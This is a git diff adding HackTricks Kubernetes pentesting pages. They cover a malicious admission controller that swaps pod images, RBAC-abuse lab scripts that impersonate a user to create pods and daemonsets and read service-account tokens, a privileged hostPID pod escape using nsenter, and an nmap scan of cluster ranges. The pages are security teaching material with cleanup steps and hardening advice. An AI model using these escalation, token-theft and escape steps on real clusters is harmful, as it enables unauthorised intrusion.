+![malicious-admission-controller.PNG](https://cdn.hashnode.com/res/hashnode/image/upload/v1628433512073/leFXtgSzm.png?auto=compress,format\&format=webp)
+
+As you can see in the above image, we tried running image `nginx` but the final executed image is `rewanthtammana/malicious-image`. What just happened!!?
+
+#### Technicalities <a href="#heading-technicalities" id="heading-technicalities"></a>
+
+The `./deploy.sh` script establishes a mutating webhook admission controller, which modifies requests to the Kubernetes API as specified in its configuration lines, influencing the outcomes observed:
+
+```
+patches = append(patches, patchOperation{
+    Op:    "replace",
+    Path:  "/spec/containers/0/image",
+    Value: "rewanthtammana/malicious-image",
+})
+```
+
+The above snippet replaces the first container image in every pod with `rewanthtammana/malicious-image`.
+
+## OPA Gatekeeper bypass
+
+{% content-ref url="../kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md" %}
+[kubernetes-opa-gatekeeper-bypass.md](../kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md)
+{% endcontent-ref %}
+
+## Best Practices
+
+### **Disabling Automount of Service Account Tokens**
+
+* **Pods and Service Accounts**: By default, pods mount a service account token. To enhance security, Kubernetes allows the disabling of this automount feature.
+* **How to Apply**: Set `automountServiceAccountToken: false` in the configuration of service accounts or pods starting from Kubernetes version 1.6.
+
+### **Restrictive User Assignment in RoleBindings/ClusterRoleBindings**
+
+* **Selective Inclusion**: Ensure that only necessary users are included in RoleBindings or ClusterRoleBindings. Regularly audit and remove irrelevant users to maintain tight security.
+
+### **Namespace-Specific Roles Over Cluster-Wide Roles**
+
+* **Roles vs. ClusterRoles**: Prefer using Roles and RoleBindings for namespace-specific permissions rather than ClusterRoles and ClusterRoleBindings, which apply cluster-wide. This approach offers finer control and limits the scope of permissions.
+
+### **Use automated tools**
+
+{% embed url="https://github.com/cyberark/KubiScan" %}
+
+{% embed url="https://github.com/aquasecurity/kube-hunter" %}
+
+{% embed url="https://github.com/aquasecurity/kube-bench" %}
+
+## **References**
+
+* [**https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions**](https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions)
+* [**https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1**](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1)
+* [**https://blog.rewanthtammana.com/creating-malicious-admission-controllers**](https://blog.rewanthtammana.com/creating-malicious-admission-controllers)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md b/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md
new file mode 100644
index 0000000000..c32fbcd562
--- /dev/null
+++ b/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md
@@ -0,0 +1,639 @@
+# Kubernetes Roles Abuse Lab
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+You can run these labs just inside **minikube**.
+
+## Pod Creation -> Escalate to ns SAs
+
+We are going to create:
+
+* A **Service account "test-sa"** with a cluster privilege to **read secrets**
+  * A ClusterRole "test-cr" and a ClusterRoleBinding "test-crb" will be created
+* **Permissions** to list and **create** pods to a user called "**Test**" will be given
+  * A Role "test-r" and RoleBinding "test-rb" will be created
+* Then we will **confirm** that the SA can list secrets and that the user Test can list a pods
+* Finally we will **impersonate the user Test** to **create a pod** that includes the **SA test-sa** and **steal** the service account **token.**
+  * This is the way yo show the user could escalate privileges this way
+
+{% hint style="info" %}
+To create the scenario an admin account is used.\
+Moreover, to **exfiltrate the sa token** in this example the **admin account is used** to exec inside the created pod. However, **as explained here**, the **declaration of the pod could contain the exfiltration of the token**, so the "exec" privilege is not necesario to exfiltrate the token, the **"create" permission is enough**.
+{% endhint %}
+
+```bash
+# Create Service Account test-sa
+# Create role and rolebinding to give list and create permissions over pods in default namespace to user Test
+# Create clusterrole and clusterrolebinding to give the SA test-sa access to secrets everywhere
+
+echo 'apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: test-sa
+---
+kind: Role
+apiVersion: rbac.authorization.k8s.io/v1
+metadata:
+  name: test-r
+rules:
+  - apiGroups: [""]
+    resources: ["pods"]
+    verbs: ["get", "list", "delete", "patch", "create"]
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: RoleBinding
+metadata:
+  name: test-rb
+subjects:
+  - kind: ServiceAccount
+    name: test-sa
+  - kind: User
+    name: Test
+roleRef:
+  kind: Role
+  name: test-r
+  apiGroup: rbac.authorization.k8s.io
+---
+kind: ClusterRole
+apiVersion: rbac.authorization.k8s.io/v1
+metadata:
+  name: test-cr
+rules:
+  - apiGroups: [""]
+    resources: ["secrets"]
+    verbs: ["get", "list", "delete", "patch", "create"]
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRoleBinding
+metadata:
+  name: test-crb
+subjects:
+  - kind: ServiceAccount
+    namespace: default
+    name: test-sa
+    apiGroup: ""
+roleRef:
+  kind: ClusterRole
+  name: test-cr
+  apiGroup: rbac.authorization.k8s.io' | kubectl apply -f -
+
+# Check test-sa can access kube-system secrets
+kubectl --as system:serviceaccount:default:test-sa -n kube-system get secrets
+
+# Check user User can get pods in namespace default
+kubectl --as Test -n default get pods
+
+# Create a pod as user Test with the SA test-sa (privesc step)
+echo "apiVersion: v1
+kind: Pod
+metadata:
+  name: test-pod
+  namespace: default
+spec:
+  containers:
+  - name: alpine
+    image: alpine
+    command: ['/bin/sh']
+    args: ['-c', 'sleep 100000']
+  serviceAccountName: test-sa
+  automountServiceAccountToken: true
+  hostNetwork: true"| kubectl --as Test apply -f -
+
+# Connect to the pod created an confirm the attached SA token belongs to test-sa
+kubectl exec -ti -n default test-pod -- cat /var/run/secrets/kubernetes.io/serviceaccount/token | cut -d "." -f2 | base64 -d
+
+# Clean the scenario
+kubectl delete pod test-pod
+kubectl delete clusterrolebinding test-crb
+kubectl delete clusterrole test-cr
+kubectl delete rolebinding test-rb
+kubectl delete role test-r
+kubectl delete serviceaccount test-sa
+```
+
+## Create Daemonset
+
+```bash
+# Create Service Account test-sa
+# Create role and rolebinding to give list & create permissions over daemonsets in default namespace to user Test
+# Create clusterrole and clusterrolebinding to give the SA test-sa access to secrets everywhere
+
+echo 'apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: test-sa
+---
+kind: Role
+apiVersion: rbac.authorization.k8s.io/v1
+metadata:
+  name: test-r
+rules:
+  - apiGroups: ["apps"]
+    resources: ["daemonsets"]
+    verbs: ["get", "list", "create"]
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: RoleBinding
+metadata:
+  name: test-rb
+subjects:
+  - kind: User
+    name: Test
+roleRef:
+  kind: Role
+  name: test-r
+  apiGroup: rbac.authorization.k8s.io
+---
+kind: ClusterRole
+apiVersion: rbac.authorization.k8s.io/v1
+metadata:
+  name: test-cr
+rules:
+  - apiGroups: [""]
+    resources: ["secrets"]
+    verbs: ["get", "list", "delete", "patch", "create"]
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRoleBinding
+metadata:
+  name: test-crb
+subjects:
+  - kind: ServiceAccount
+    namespace: default
+    name: test-sa
+    apiGroup: ""
+roleRef:
+  kind: ClusterRole
+  name: test-cr
+  apiGroup: rbac.authorization.k8s.io' | kubectl apply -f -
+
+# Check test-sa can access kube-system secrets
+kubectl --as system:serviceaccount:default:test-sa -n kube-system get secrets
+
+# Check user User can get pods in namespace default
+kubectl --as Test -n default get daemonsets
+
+# Create a daemonset as user Test with the SA test-sa (privesc step)
+echo "apiVersion: apps/v1
+kind: DaemonSet
+metadata:
+  name: alpine
+  namespace: default
+spec:
+  selector:
+    matchLabels:
+      name: alpine
+  template:
+    metadata:
+      labels:
+        name: alpine
+    spec:
+      serviceAccountName: test-sa
+      automountServiceAccountToken: true
+      hostNetwork: true
+      containers:
+      - name: alpine
+        image: alpine
+        command: ['/bin/sh']
+        args: ['-c', 'sleep 100000']"| kubectl --as Test apply -f -
+
+# Connect to the pod created an confirm the attached SA token belongs to test-sa
+kubectl exec -ti -n default daemonset.apps/alpine -- cat /var/run/secrets/kubernetes.io/serviceaccount/token | cut -d "." -f2 | base64 -d
+
+# Clean the scenario
+kubectl delete daemonset alpine
+kubectl delete clusterrolebinding test-crb
+kubectl delete clusterrole test-cr
+kubectl delete rolebinding test-rb
+kubectl delete role test-r
+kubectl delete serviceaccount test-sa
+```
+
+### Patch Daemonset
+
+In this case we are going to **patch a daemonset** to make its pod load our desired service account.
+
+If your user has the **verb update instead of patch, this won't work**.
+
+```bash
+# Create Service Account test-sa
+# Create role and rolebinding to give list & update patch permissions over daemonsets in default namespace to user Test
+# Create clusterrole and clusterrolebinding to give the SA test-sa access to secrets everywhere
+
+echo 'apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: test-sa
+---
+kind: Role
+apiVersion: rbac.authorization.k8s.io/v1
+metadata:
+  name: test-r
+rules:
+  - apiGroups: ["apps"]
+    resources: ["daemonsets"]
+    verbs: ["get", "list", "patch"]
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: RoleBinding
+metadata:
+  name: test-rb
+subjects:
+  - kind: User
+    name: Test
+roleRef:
+  kind: Role
+  name: test-r
+  apiGroup: rbac.authorization.k8s.io
+---
+kind: ClusterRole
+apiVersion: rbac.authorization.k8s.io/v1
+metadata:
+  name: test-cr
+rules:
+  - apiGroups: [""]
+    resources: ["secrets"]
+    verbs: ["get", "list", "delete", "patch", "create"]
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRoleBinding
+metadata:
+  name: test-crb
+subjects:
+  - kind: ServiceAccount
+    namespace: default
+    name: test-sa
+    apiGroup: ""
+roleRef:
+  kind: ClusterRole
+  name: test-cr
+  apiGroup: rbac.authorization.k8s.io
+---
+apiVersion: apps/v1
+kind: DaemonSet
+metadata:
+  name: alpine
+  namespace: default
+spec:
+  selector:
+    matchLabels:
+      name: alpine
+  template:
+    metadata:
+      labels:
+        name: alpine
+    spec:
+      automountServiceAccountToken: false
+      hostNetwork: true
+      containers:
+      - name: alpine
+        image: alpine
+        command: ['/bin/sh']
+        args: ['-c', 'sleep 100']' | kubectl apply -f -
+
+# Check user User can get pods in namespace default
+kubectl --as Test -n default get daemonsets
+
+# Create a daemonset as user Test with the SA test-sa (privesc step)
+echo "apiVersion: apps/v1
+kind: DaemonSet
+metadata:
+  name: alpine
+  namespace: default
+spec:
+  selector:
+    matchLabels:
+      name: alpine
+  template:
+    metadata:
+      labels:
+        name: alpine
+    spec:
+      serviceAccountName: test-sa
+      automountServiceAccountToken: true
+      hostNetwork: true
+      containers:
+      - name: alpine
+        image: alpine
+        command: ['/bin/sh']
+        args: ['-c', 'sleep 100000']"| kubectl --as Test apply -f -
+
+# Connect to the pod created an confirm the attached SA token belongs to test-sa
+kubectl exec -ti -n default daemonset.apps/alpine -- cat /var/run/secrets/kubernetes.io/serviceaccount/token | cut -d "." -f2 | base64 -d
+
+# Clean the scenario
+kubectl delete daemonset alpine
+kubectl delete clusterrolebinding test-crb
+kubectl delete clusterrole test-cr
+kubectl delete rolebinding test-rb
+kubectl delete role test-r
+kubectl delete serviceaccount test-sa
+```
+
+## Doesn't work
+
+### Create/Patch Bindings
+
+**Doesn't work:**
+
+* **Create a new RoleBinding** just with the verb **create**
+* **Create a new RoleBinding** just with the verb **patch** (you need to have the binding permissions)
+  * You cannot do this to assign the role to yourself or to a different SA
+* **Modify a new RoleBinding** just with the verb **patch** (you need to have the binding permissions)
+  * You cannot do this to assign the role to yourself or to a different SA
+
+```bash
+echo 'apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: test-sa
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: test-sa2
+---
+kind: Role
+apiVersion: rbac.authorization.k8s.io/v1
+metadata:
+  name: test-r
+rules:
+  - apiGroups: ["rbac.authorization.k8s.io"]
+    resources: ["rolebindings"]
+    verbs: ["get", "patch"]
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: RoleBinding
+metadata:
+  name: test-rb
+subjects:
+  - kind: User
+    name: Test
+roleRef:
+  kind: Role
+  name: test-r
+  apiGroup: rbac.authorization.k8s.io
+---
+kind: Role
+apiVersion: rbac.authorization.k8s.io/v1
+metadata:
+  name: test-r2
+rules:
+  - apiGroups: [""]
+    resources: ["pods"]
+    verbs: ["get", "list", "delete", "patch", "create"]
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: RoleBinding
+metadata:
+  name: test-rb2
+subjects:
+  - kind: ServiceAccount
+    name: test-sa
+    apiGroup: ""
+roleRef:
+  kind: Role
+  name: test-r2
+  apiGroup: rbac.authorization.k8s.io' | kubectl apply -f -
+
+# Create a pod as user Test with the SA test-sa (privesc step)
+echo "apiVersion: rbac.authorization.k8s.io/v1
+kind: RoleBinding
+metadata:
+  name: test-r2
+subjects:
+  - kind: ServiceAccount
+    name: test-sa2
+    apiGroup: ""
+roleRef:
+  kind: Role
+  name: test-r2
+  apiGroup: rbac.authorization.k8s.io"| kubectl --as Test apply -f -
+
+# Connect to the pod created an confirm the attached SA token belongs to test-sa
+kubectl exec -ti -n default test-pod -- cat /var/run/secrets/kubernetes.io/serviceaccount/token | cut -d "." -f2 | base64 -d
+
+# Clean the scenario
+kubectl delete rolebinding test-rb
+kubectl delete rolebinding test-rb2
+kubectl delete role test-r
+kubectl delete role test-r2
+kubectl delete serviceaccount test-sa
+kubectl delete serviceaccount test-sa2
+```
+
+### Bind explicitly Bindings
+
+In the "Privilege Escalation Prevention and Bootstrapping" section of [https://unofficial-kubernetes.readthedocs.io/en/latest/admin/authorization/rbac/](https://unofficial-kubernetes.readthedocs.io/en/latest/admin/authorization/rbac/) it's mentioned that if a SA can create a Binding and has explicitly Bind permissions over the Role/Cluster role, it can create bindings even using Roles/ClusterRoles with permissions that it doesn't have.\
+However, it didn't work for me:
+
+```yaml
+# Create 2 SAs, give one of them permissions to create clusterrolebindings
+# and bind permissions over the ClusterRole "admin"
+echo 'apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: test-sa
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: test-sa2
+---
+kind: ClusterRole
+apiVersion: rbac.authorization.k8s.io/v1
+metadata:
+  name: test-cr
+rules:
+  - apiGroups: ["rbac.authorization.k8s.io"]
+    resources: ["clusterrolebindings"]
+    verbs: ["get", "create"]
+  - apiGroups: ["rbac.authorization.k8s.io/v1"]
+    resources: ["clusterroles"]
+    verbs: ["bind"]
+    resourceNames: ["admin"]
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRoleBinding
+metadata:
+  name: test-crb
+subjects:
+  - kind: ServiceAccount
+    name: test-sa
+    namespace: default
+roleRef:
+  kind: ClusterRole
+  name: test-cr
+  apiGroup: rbac.authorization.k8s.io
+' | kubectl apply -f -
+
+# Try to bind the ClusterRole "admin" with the second SA (won't work)
+echo 'apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRoleBinding
+metadata:
+  name: test-crb2
+subjects:
+  - kind: ServiceAccount
+    name: test-sa2
+    namespace: default
+roleRef:
+  kind: ClusterRole
+  name: admin
+  apiGroup: rbac.authorization.k8s.io
+' | kubectl --as system:serviceaccount:default:test-sa apply -f -
+
+# Clean environment
+kubectl delete clusterrolebindings test-crb
+kubectl delete clusterrolebindings test-crb2
+kubectl delete clusterrole test-cr
+kubectl delete serviceaccount test-sa
+kubectl delete serviceaccount test-sa
+```
+
+```yaml
+# Like the previous example, but in this case we try to use RoleBindings
+# instead of CLusterRoleBindings
+
+echo 'apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: test-sa
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: test-sa2
+---
+kind: ClusterRole
+apiVersion: rbac.authorization.k8s.io/v1
+metadata:
+  name: test-cr
+rules:
+  - apiGroups: ["rbac.authorization.k8s.io"]
+    resources: ["clusterrolebindings"]
+    verbs: ["get", "create"]
+  - apiGroups: ["rbac.authorization.k8s.io"]
+    resources: ["rolebindings"]
+    verbs: ["get", "create"]
+  - apiGroups: ["rbac.authorization.k8s.io/v1"]
+    resources: ["clusterroles"]
+    verbs: ["bind"]
+    resourceNames: ["admin","edit","view"]
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: RoleBinding
+metadata:
+  name: test-rb
+  namespace: default
+subjects:
+  - kind: ServiceAccount
+    name: test-sa
+    namespace: default
+roleRef:
+  kind: ClusterRole
+  name: test-cr
+  apiGroup: rbac.authorization.k8s.io
+' | kubectl apply -f -
+
+# Won't work
+echo 'apiVersion: rbac.authorization.k8s.io/v1
+kind: RoleBinding
+metadata:
+  name: test-rb2
+  namespace: default
+subjects:
+  - kind: ServiceAccount
+    name: test-sa2
+    namespace: default
+roleRef:
+  kind: ClusterRole
+  name: admin
+  apiGroup: rbac.authorization.k8s.io
+' | kubectl --as system:serviceaccount:default:test-sa apply -f -
+
+# Clean environment
+kubectl delete rolebindings test-rb
+kubectl delete rolebindings test-rb2
+kubectl delete clusterrole test-cr
+kubectl delete serviceaccount test-sa
+kubectl delete serviceaccount test-sa2
+```
+
+### Arbitrary roles creation
+
+In this example we try to create a role having the permissions create and path over the roles resources. However, K8s prevent us from creating a role with more permissions the principal creating is has:
+
+```yaml
+# Create a SA and give the permissions "create" and "patch" over "roles"
+echo 'apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: test-sa
+---
+kind: Role
+apiVersion: rbac.authorization.k8s.io/v1
+metadata:
+  name: test-r
+rules:
+  - apiGroups: ["rbac.authorization.k8s.io"]
+    resources: ["roles"]
+    verbs: ["patch", "create", "get"]
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: RoleBinding
+metadata:
+  name: test-rb
+subjects:
+  - kind: ServiceAccount
+    name: test-sa
+roleRef:
+  kind: Role
+  name: test-r
+  apiGroup: rbac.authorization.k8s.io
+' | kubectl apply -f -
+
+# Try to create a role over all the resources  with "create" and "patch"
+# This won't wotrk
+echo 'kind: Role
+apiVersion: rbac.authorization.k8s.io/v1
+metadata:
+  name: test-r2
+rules:
+  - apiGroups: [""]
+    resources: ["*"]
+    verbs: ["patch", "create"]' | kubectl --as system:serviceaccount:default:test-sa apply -f-
+
+# Clean the environment
+kubectl delete rolebinding test-rb
+kubectl delete role test-r
+kubectl delete role test-r2
+kubectl delete serviceaccount test-sa
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md b/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md
new file mode 100644
index 0000000000..f913d5ccf9
--- /dev/null
+++ b/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md
@@ -0,0 +1,63 @@
+# Pod Escape Privileges
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Privileged and hostPID
+
+With these privileges you will have **access to the hosts processes** and **enough privileges to enter inside the namespace of one of the host processes**.\
+Note that you can potentially not need privileged but just some capabilities and other potential defenses bypasses (like apparmor and/or seccomp).
+
+Just executing something like the following will allow you to escape from the pod:
+
+```bash
+nsenter --target 1 --mount --uts --ipc --net --pid -- bash
+```
+
+Configuration example:
+
+```yaml
+apiVersion: v1
+kind: Pod
+metadata:
+  name: priv-and-hostpid-exec-pod
+  labels:
+    app: pentest
+spec:
+  hostPID: true
+  containers:
+  - name: priv-and-hostpid-pod
+    image: ubuntu
+    tty: true
+    securityContext:
+      privileged: true
+    command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
+  #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md b/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md
new file mode 100644
index 0000000000..4111552574
--- /dev/null
+++ b/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md
@@ -0,0 +1,422 @@
+# Attacking Kubernetes from inside a Pod
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## **Pod Breakout**
+
+**If you are lucky enough you may be able to escape from it to the node:**
+
+![](https://sickrov.github.io/media/Screenshot-161.jpg)
+
+### Escaping from the pod
+
+In order to try to escape from the pods you might need to **escalate privileges** first, some techniques to do it:
+
+{% embed url="https://book.hacktricks.xyz/linux-hardening/privilege-escalation" %}
+
+You can check this **docker breakouts to try to escape** from a pod you have compromised:
+
+{% embed url="https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout" %}
+
+### Abusing Kubernetes Privileges
+
+As explained in the section about **kubernetes enumeration**:
+
+{% content-ref url="kubernetes-enumeration.md" %}
+[kubernetes-enumeration.md](kubernetes-enumeration.md)
+{% endcontent-ref %}
+
+Usually the pods are run with a **service account token** inside of them. This service account may have some **privileges attached to it** that you could **abuse** to **move** to other pods or even to **escape** to the nodes configured inside the cluster. Check how in:
+
+{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %}
+[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/)
+{% endcontent-ref %}
+
+### Abusing Cloud Privileges
+
+If the pod is run inside a **cloud environment** you might be able to l**eak a token from the metadata endpoint** and escalate privileges using it.
+
+## Search vulnerable network services
+
+As you are inside the Kubernetes environment, if you cannot escalate privileges abusing the current pods privileges and you cannot escape from the container, you should **search potential vulnerable services.**
+
+### Services
+
+**For this purpose, you can try to get all the services of the kubernetes environment:**
+
+```
+kubectl get svc --all-namespaces
+```
+
+By default, Kubernetes uses a flat networking schema, which means **any pod/service within the cluster can talk to other**. The **namespaces** within the cluster **don't have any network security restrictions by default**. Anyone in the namespace can talk to other namespaces.
+
+### Scanning
+
+The following Bash script (taken from a [Kubernetes workshop](https://github.com/calinah/learn-by-hacking-kccn/blob/master/k8s_cheatsheet.md)) will install and scan the IP ranges of the kubernetes cluster:
+
+```bash
+sudo apt-get update
+sudo apt-get install nmap
+nmap-kube () 
+{ 
+    nmap --open -T4 -A -v -Pn -p 80,443,2379,8080,9090,9100,9093,4001,6782-6784,6443,8443,9099,10250,10255,10256 "${@}"
+}
+
+nmap-kube-discover () {
+    local LOCAL_RANGE=$(ip a | awk '/eth0$/{print $2}' | sed 's,[0-9][0-9]*/.*,*,');                                                                  
+    local SERVER_RANGES=" ";
+    SERVER_RANGES+="10.0.0.1 ";
+    SERVER_RANGES+="10.0.1.* ";
+    SERVER_RANGES+="10.*.0-1.* ";
+    nmap-kube ${SERVER_RANGES} "${LOCAL_RANGE}"
+}
+nmap-kube-discover
+```
+
+Check out the following page to learn how you could **attack Kubernetes specific services** to **compromise other pods/all the environment**:
+
+{% content-ref url="pentesting-kubernetes-services/" %}
+[pentesting-kubernetes-services](pentesting-kubernetes-services/)
+{% endcontent-ref %}
+
+### Sniffing
+
+In case the **compromised pod is running some sensitive service** where other pods need to authenticate you might be able to obtain the credentials send from the other pods **sniffing local communications**.
+
+## Network Spoofing
+
